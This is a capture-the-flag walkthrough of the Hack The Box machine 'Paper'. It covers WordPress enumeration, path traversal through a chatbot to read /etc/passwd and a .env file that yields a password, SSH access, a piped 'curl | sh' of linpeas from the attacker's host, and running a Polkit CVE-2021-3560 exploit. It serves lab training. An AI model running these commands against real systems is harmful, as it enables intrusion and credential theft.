Hack_The_Box_Writeups

HackTheBox – Paper Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.143

http://10.10.11.143/

Add this domain in /etc/hosts and navigate on office.paper after we can notice that this subdomain run wordpress.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# wpscan –url http://office.paper/ –enumerate u,ap

And we can notice that the version is 5.2.3, now we can find a CVE for this version here: https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

So we can use :

https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2

http://office.paper/?static=1

And in page we get this

So now navigate on this website but remember to add it in /etc/hosts.

http://chat.office.paper/register/8qozr226AhkCHZdyY

Register an account here and login. After a little bit of time, a pop-up will appear with a chat general. Now we can see that this bot use his own command like this:

The bot use this recyclops

For communicate with the localhost, but we can’t talk in this chat because is “read only” so, let’s communicate with the bot privately and try to use this command.

recyclops file ../../../../etc/passwd

After that we can enumerate the user and we will find the correct password:

recyclops file ../hubot/.env

We get the password : Queenofblad3s!23

Let’s back and check the user available in this machine using file ../../../etc/passwd and we found [dwight] have access to [/bin/bash]

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh dwight@10.10.11.143

VERTICAL PRIVESC

Now we can notice a file, in the user directory that recall an exploit:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

[dwight@paper tmp]$ curl -L http://10.10.14.102:8000/linpeas.sh | sh

https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

┌──(root㉿kali)-[/home/kali/Downloads]

└─# wget https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

[dwight@paper tmp]$ wget http://10.10.14.102:8000/CVE-2021-3560.py

[dwight@paper tmp]$ chmod +x CVE-2021-3560.py

[dwight@paper tmp]$ python3 CVE-2021-3560.py

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *